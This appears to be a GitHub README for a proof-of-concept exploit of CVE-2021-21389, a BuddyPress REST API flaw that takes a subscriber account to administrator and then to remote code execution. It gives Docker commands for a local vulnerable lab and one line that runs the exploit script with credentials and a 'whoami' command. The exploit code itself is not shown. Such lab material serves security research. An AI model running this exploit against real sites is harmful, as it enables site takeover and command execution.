CVE-2021-21389
BuddyPress < 7.2.1 - REST API Privilege Escalation to RCE
PoC (Full)
Affected version: 5.0.0 to 7.2.0
User requirement: Subscriber user
Method: Privilege Escalation to Administrator and trigger RCE via REST API
Endpoint: /v1/members/me endpoint.
How to use Docker
git clone https://github.com/HoangKien1020/CVE-2021-21389
cd CVE-2021-21389/
docker build . -t hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Other way to pull this docker instead of building:
docker pull hoangkien1020/buddypress:cve202121389
docker run -d --rm -it -p 8080:80 hoangkien1020/buddypress:cve202121389
Access your host/IP
Ex: http://test.local:8080
How to exploit
python3 CVE-2021-21389.py http://test.local:8080 test 1234 whoami
Example:
Reference
https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
77 Dec 06, 2022
1 Dec 14, 2021
22 Dec 29, 2022
1.5k Dec 31, 2022
365 Nov 30, 2022
633 Dec 30, 2022
8 Sep 02, 2022
3 Sep 26, 2022
25 Dec 06, 2022
4.1k Jan 09, 2023
13 Nov 03, 2022
141 Dec 31, 2022
30 May 17, 2022
64 Oct 18, 2022
13 Jul 13, 2022
282 Dec 30, 2022
27 Dec 20, 2022
25 Nov 24, 2022
8.1k Dec 31, 2022